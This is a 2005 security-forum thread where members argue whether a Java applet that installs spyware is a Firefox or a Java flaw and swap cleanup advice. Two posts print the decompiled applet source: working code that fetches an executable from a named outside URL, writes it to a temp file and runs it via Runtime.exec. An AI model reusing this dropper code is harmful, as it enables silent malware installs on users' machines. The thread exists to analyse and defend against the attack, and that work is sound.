WE'RE SURE THAT YOU'LL LOVE US!

Hey there! :wub: Looks like you're enjoying the discussion, but you're not signed up for an account. When you create an account, we remember exactly what you've read, so you always come right back where you left off. You also get notifications, here and via email, whenever new posts are made. You can like posts to share the love. Join 93121 other members! Anybody can ask, anybody can answer. Consistently helpful members may be invited to become staff. Here's how it works. Virus cleanup? Start here -> Malware Removal Forum.

Try What the Tech -- It's free!

Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Theory

Started by Coyote , Mar 04 2005 10:10 AM

Page 3 of 8
1
2
3
4
5

Please log in to reply

116 replies to this topic

#31 grummy

Retired Staff

Authentic Member
22 posts

Posted 11 March 2005 - 09:00 PM

I just looked in Contol Panel and opened the up Java. It's checked : Do not start the console. Maybe that's the differance. ?? :blink:

Follow Up: Ran SpyBot S&D and Spy Sweeper = No Problems Ran AVG selected scan on the Windows/ .jpi_cache folder (the Java cache). It located two virus files : Java/ByteVerify and Java/JavaOpenStream, Both were not active and resided inside Zip files. I would suggest anyone that visited that link run an AV scan on the above mention Folder. C:/Windows/.jpg_cache

Edited by grummy, 11 March 2005 - 11:40 PM.

"The secret to creativity is knowing how to hide your sources." Albert Einstein.

Advertisements

Register to Remove

#32 Guest_Paperghost_*

Guests

Posted 12 March 2005 - 05:36 AM

Some people have said that this only affects older versions of Java - however I've run the same tests on a number of different boxes with the most up to date version of Java and the popup asking for the install still appears. So im not sure why some people do get it and others dont, even with the "same" setup.

#33 Guest_Paperghost_*

Guests

Posted 12 March 2005 - 06:11 AM

Funnily enough, "Java/JavaOpenStream" has been around for a while and is installed from the same wonderful ysbweb.com website. If you actually do a search for that particular beast, you'll find lots of threads from puzzled people who were surprised to find it onboard even though they'd been using FF / alternative browser for a long time, if not always. I actually found it on one of my boxes a while back which only used Firefox - this particular method of install has probably been doing the rounds for quite some time and is only now coming to light.

#34 Mike

Spykiller Supremus

Authentic Member
33 posts

Posted 12 March 2005 - 02:07 PM

Guys, this is not a browser problem. This is a Java applet, meaning it will happen to any browser that lets Java run. You can call it a problem with Java if you want to call it a problem at all, but saying the web browser allows this is not the truth. And I'd like to point out that Java did just what it is designed to do when an applet attempts to bypass the security sandboxing, it popped a very plainly worded security warning that the applet is using an unverified certificate from an untrusted company.

#35 Guest_Paperghost_*

Guests

Posted 12 March 2005 - 03:47 PM

Actually, it IS a browser problem in that the browser vendors could instigate a "whitelist" along the lines of what they use for allowing software installs from update.mozilla.org. Mozilla are actually exploring this idea right now. So in that sense, the browser IS allowing it, it is a browser problem and browser vendors are now actively taking it on and attempting to resolve in tandem with Sun.

However you look at it, the vulnerable browser is allowing something to run unchecked and simply relying on the intelligence of the end user. To flag it is great, but then to put the decision in the hands of someone who may not be up to that task is utterly insane - they might as well not have bothered.

In addition, with regards sandboxing, to quote someone from my site who had responded to someone else mentioning the sandboxing and certificates:

Site visitor 1:"Does anyone reminds himself that JAVA applets are executed in a SANDBOX, and therefore could not propagate anything out of their sandboxes, except if, as always under zinblows, the user would allow it?"

Site visitor 2:// begin exploit

private void jbInit()
throws Exception
{
File file = File.createTempFile(app, ".exe");
ByteArrayOutputStream bytearrayoutputstream = downloadFile(url);
if(bytearrayoutputstream == null)
throw new IOException("downloading was failed");
String s = saveFile(bytearrayoutputstream, file);
bytearrayoutputstream.close();
String s1 = "";
if(account_id != null && account_id.length() > 0)
s1 = s1 + " /aid:" + account_id;
if(download_key != null && download_key.length() > 0)
s1 = s1 + " /key:" + download_key;
if(download_lock != null && download_lock.length() > 0)
s1 = s1 + " /lock:" + download_lock;
if(cfg != null && cfg.length() > 0)
s1 = s1 + " /cfg:" + cfg;
if(sub != null && sub.length() > 0)
s1 = s1 + " /sub:" + sub;
Runtime.getRuntime().exec(file.getAbsolutePath() + s1);
}

// end exploit

the problem is that Runtime.exec() shouldn't even work from within the browser framework, dialog warnings or not. there is no SANDBOX when you allow this. most people aren't aware that Java can do this.

So in that way, the sandbox doesn't even come into it.

The sad thing is, only Mozilla came back to me with a response - the other vendors haven't as of yet. Though that speaks volumes for Mozilla's willingness to take on such a problem.

Edited by Paperghost, 12 March 2005 - 03:50 PM.

#36 mpfeif101

Authentic Member

Authentic Member
80 posts

Interests:0

Posted 13 March 2005 - 10:59 AM

Check out Mike's newsletter... well said:

http://www.spywareinfo.net

#37 Guest_Paperghost_*

Guests

Posted 13 March 2005 - 11:25 AM

My frustration with this is that people are calling it a problem with Firefox. That is patently untrue. Every single browser is going to pop up a similar warning when it encounters this particular Java applet. If this had been labeled a problem with all web browsers, it still would be untrue, but at least it would not slander a particular browser. The people publishing this libelous nonsense should be ashamed of themselves and should print a prominent correction.

Libelous nonsense?

Presumably he means me?

Dear oh dear. I dont know whether people are reading the wrong article here, but at all points in my piece i state quite clearly that the problem is CAUSED BY JAVA. However I give an example of what that java applet does whilst using Firefox to illustrate the point that no browser is safe.

However, seeing as Mozilla have now taken this problem on as A BROWSER ISSUE then our opinion of what it is or isnt doesnt really matter after that point.

And to be honest, you'd have to be pretty dense to click "Yes" to such a prompt arriving out of nowhere.

Thats a good one - pretending that many spyware installs dont occur as a result of user interaction!

I think I'll be replying in kind to Spywareinfo.

#38 Racktracker

Hunter of Malware

Authentic Member
381 posts

Posted 13 March 2005 - 01:15 PM

If people were being infected without warning via a stealth install, I would agree 100% that this is a serious problem. The truth of the matter is that you get a popup asking permision to install "sofware" from this site. If you answer no then nothing is installed. This is the very similar to the popup you will get when using IE and viewing the same site requesting to install an activeX control. So if this is evidence that there is a serious flaw in firefox then we can also say that this is a serious flaw in IE. If we can say this is a serious flaw in java then it is also a serious flaw in activeX. As I said before, if you make poor choices while surfing the internet no amount of software is going to keep you from being infected.

The help you receive here is free. If you wish to show your appreciation, then you may donate to help keep us online.

Posted Image

#39 Efwis

Authentic Member

Authentic Member
76 posts

Posted 13 March 2005 - 01:18 PM

I should point out, and this by no means goes against what everyone here has said in one way or another. When I went to the site and got infected the first time, I got no kind of notification other then Kerio asking to let Moz connect to the site

helpful links

Hijack This!

Spybot: Search & Destroy

CWShredder

So How did I get infected in the first place?

#40 Racktracker

Hunter of Malware

Authentic Member
381 posts

Posted 13 March 2005 - 02:33 PM

I'm not sure of the circumstances in Efwis' case, but I can't get it to infect me without the popup. Using Mozilla 1.7.5 with default settings. Without java installed - no popup, no infection With java installed - same popup as with firefox.

The help you receive here is free. If you wish to show your appreciation, then you may donate to help keep us online.

Posted Image

Advertisements

Register to Remove

#41 harpwolf

New Member

New Member
1 posts

Posted 13 March 2005 - 04:09 PM

Efwis, can you post a link to the website

That is something that I would rather not post for the safety of our members. However, I can tell you that the website is real since the above log is not mine, but a fellow malware hunter's log from going to the same site I did.

I work for a major search engine and I'd appreciate it if someone would email me the site name(s) involved. I certainly grok that I shouldn't visit the sites

so please do mention it's an infected site. I want to make sure we remove it from our search engine so users don't get nailed. Thanks.

#42 southernlady

New Member

New Member
12 posts

Interests:computers, reading, genealogy

Posted 13 March 2005 - 09:12 PM

I was reading paperghost's site and then went to the article at the Register and it did some very FUNKY things to my browser...btw, I'm using Firefox...I did some screenshots of it if anyone whould care to see it. http://www.priorityc....net/page2.html Liz

Southerngazebo.com
SouthernladySecurity.com
Southernlady's Ramblings My blog
Member of ASAP since 2005

#43 EVApilot

New Member

New Member
1 posts

Posted 14 March 2005 - 10:41 AM

You'll be glad to know that the applets fail on Fedora, even with a full IE setup on Wine and MISC binary support

#44 rob_

New Member

Authentic Member
10 posts

Posted 14 March 2005 - 11:43 AM

And I'd like to point out that Java did just what it is designed to do when an applet attempts to bypass the security sandboxing, it popped a very plainly worded security warning that the applet is using an unverified certificate from an untrusted company.

Here is certificate warning, courtesy of another user from another board:

Posted Image

Now, nothing in that certificate says that the applet wishes to download a PE file (native executable binary) into the Windows temporary directory and then execute it. So I would respectfully disagree that the average user (98% of them) would worry much about this particular warning. For the simple reason that, most people who have any concept of what Java is, have also assimilated the common, if erroneous, notion that Java applets only run inside of a "security sandbox".

I personally believe that people really shouldn't have to worry about whether a piece of Java code has been signed or not when such code is executed from the context of a browser. Now, if someone wants to download a Java applet and start it up from the command line, and wish to grant it complete authority to trash their system, that's their prerogative. But unless the Firefox team wants Java to get the same evil reputation as ActiveX, they should work with Sun to figure out how to constrain Java calls to File.createTempFile() and Runtime.exec() and provide users with a default false setting to new options in about:config, for example "java.allow.runtime.exec" and "java.allow.file.createtempfile". This would "solve" the problem for 98% of the user community.

Thanks Paperghost for finding my little post in the blizzard of comments on your site. Had you not posted about the exploit, I wouldn't have read about it on theregister.co.uk

Here is the rest of the decompiled jar file. Please notice that all of the malware installation is done by the PE executable that the Java applet downloads and runs, and is not done directly by the Java applet itself. Please also note that the downloaded PE file could have been any sort of payload (virus, worm, trojan, rootkit, whatever), and thus offers a vector against Firefox itself.

Cheers.


// Decompiled by "rob"
// Source File Name:   InstallerApplet.java

package javainstaller;

import java.applet.Applet;
import java.awt.*;
import java.io.*;
import java.net.*;

public class InstallerApplet extends Applet
{

    public String getParameter(String s, String s1)
    {
        return isStandalone ? System.getProperty(s, s1) : getParameter(s) == null ? s1 : getParameter(s);
    }

    public ByteArrayOutputStream downloadFile(String s)
        throws IOException
    {
        URL url1 = new URL(s);
        InputStream inputstream = url1.openStream();
        if(inputstream == null)
            throw new IOException("the stream of the connection was null");
        byte abyte0[] = new byte[26384];
        ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
        for(int i = 0; i != -1;)
        {
            i = inputstream.read(abyte0, 0, 26384);
            if(i != -1)
                bytearrayoutputstream.write(abyte0, 0, i);
        }

        if(inputstream != null)
            inputstream.close();
        return bytearrayoutputstream;
    }

    public String saveFile(ByteArrayOutputStream bytearrayoutputstream, File file)
        throws IOException
    {
        FileOutputStream fileoutputstream = new FileOutputStream(file);
        fileoutputstream.write(bytearrayoutputstream.toByteArray());
        if(fileoutputstream != null)
            fileoutputstream.close();
        return file.getAbsolutePath();
    }

    public InstallerApplet()
    {
        isStandalone = false;
        url = "http://www.slotch.com/ist/softwares/v4.0/istdownload.exe";
        app = "iinstall";
        vmcZV9HHQsT = "bk5CaeGOco7CU7rSfX7U2LxsptOacuqwyEaNRfRVle7M8NYegXGftdPyBrGAbdGNJ8RCac";
        vGDI5wuEjJQxI = "9G7ftFBBGpnnwP1v4BWeyp";
        vDjMcU3yvG = "lx1E039A5SF7OnBOGOdWT4gOJ52kfceX59iGRAQPxCK4GSEWEbv";
    }

    public void init()
    {
        try
        {
            account_id = getParameter("account_id", "");
            download_key = getParameter("download_key", "");
            download_lock = getParameter("download_lock", "");
            cfg = getParameter("cfg", "");
            sub = getParameter("sub", "");
        }
        catch(Exception exception)
        {
            exception.printStackTrace();
        }
        try
        {
            jbInit();
        }
        catch(Exception exception1)
        {
            exception1.printStackTrace();
        }
    }

    private void jbInit()
        throws Exception
    {
        File file = File.createTempFile(app, ".exe");
        ByteArrayOutputStream bytearrayoutputstream = downloadFile(url);
        if(bytearrayoutputstream == null)
            throw new IOException("downloading was failed");
        String s = saveFile(bytearrayoutputstream, file);
        bytearrayoutputstream.close();
        String s1 = "";
        if(account_id != null && account_id.length() > 0)
            s1 = s1 + " /aid:" + account_id;
        if(download_key != null && download_key.length() > 0)
            s1 = s1 + " /key:" + download_key;
        if(download_lock != null && download_lock.length() > 0)
            s1 = s1 + " /lock:" + download_lock;
        if(cfg != null && cfg.length() > 0)
            s1 = s1 + " /cfg:" + cfg;
        if(sub != null && sub.length() > 0)
            s1 = s1 + " /sub:" + sub;
        Runtime.getRuntime().exec(file.getAbsolutePath() + s1);
    }

    public String getAppletInfo()
    {
        return "Applet Information";
    }

    public String[][] getParameterInfo()
    {
        String as[][] = {
            {
                "param1", "String", ""
            }, {
                "download_key", "String", ""
            }, {
                "download_lock", "String", ""
            }
        };
        return as;
    }

    public static void downloadApp(String s, File file)
    {
label0:
        {
            Object obj = null;
            if(s == null)
                break label0;
            HttpURLConnection httpurlconnection = null;
            try
            {
                try
                {
                    URL url1 = new URL(s);
                    httpurlconnection = (HttpURLConnection)url1.openConnection();
                    httpurlconnection.setRequestMethod("POST");
                    httpurlconnection.setDoInput(true);
                    httpurlconnection.setDoOutput(true);
                    httpurlconnection.setUseCaches(false);
                    httpurlconnection.setAllowUserInteraction(true);
                    HttpURLConnection.setFollowRedirects(true);
                    httpurlconnection.setInstanceFollowRedirects(true);
                    InputStream inputstream = null;
                    FileOutputStream fileoutputstream = null;
                    try
                    {
                        inputstream = httpurlconnection.getInputStream();
                        fileoutputstream = new FileOutputStream(file);
                        byte abyte0[] = new byte[1000];
                        try
                        {
                            while(inputstream.read(abyte0) > 0) 
                                fileoutputstream.write(abyte0);
                        }
                        catch(IOException ioexception2)
                        {
                            System.err.println(ioexception2);
                        }
                    }
                    catch(IOException ioexception1) { }
                    finally
                    {
                        if(fileoutputstream != null)
                            fileoutputstream.close();
                        if(inputstream != null)
                            inputstream.close();
                    }
                }
                catch(MalformedURLException malformedurlexception)
                {
                    System.out.print("The URL was malformed: " + malformedurlexception.getMessage());
                    break label0;
                }
                catch(IOException ioexception)
                {
                    System.out.print("The URL caused an IO Exception: " + ioexception.getMessage());
                    break label0;
                }
                break label0;
            }
            finally
            {
                if(httpurlconnection != null)
                    httpurlconnection.disconnect();
            }
        }
    }

    public static void main(String args[])
    {
        InstallerApplet installerapplet = new InstallerApplet();
        installerapplet.isStandalone = true;
        Frame frame = new Frame();
        frame.setTitle("Applet Frame");
        frame.add(installerapplet, "Center");
        installerapplet.init();
        installerapplet.start();
        frame.setSize(1, 1);
        Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
        frame.setLocation((dimension.width - frame.getSize().width) / 2, (dimension.height - frame.getSize().height) / 2);
        frame.setVisible(true);
    }

    private boolean isStandalone;
    public static final int BUFFER_SIZE = 26384;
    String url;
    String app;
    String account_id;
    String download_key;
    String download_lock;
    String cfg;
    String sub;
    String vmcZV9HHQsT;
    String vGDI5wuEjJQxI;
    String vDjMcU3yvG;
}

Attached Thumbnails

Edited by rob_, 14 March 2005 - 11:47 AM.

#45 Guest_Paperghost_*

Guests

Posted 14 March 2005 - 01:24 PM

Excellent post, Rob

Body Background

skin color theme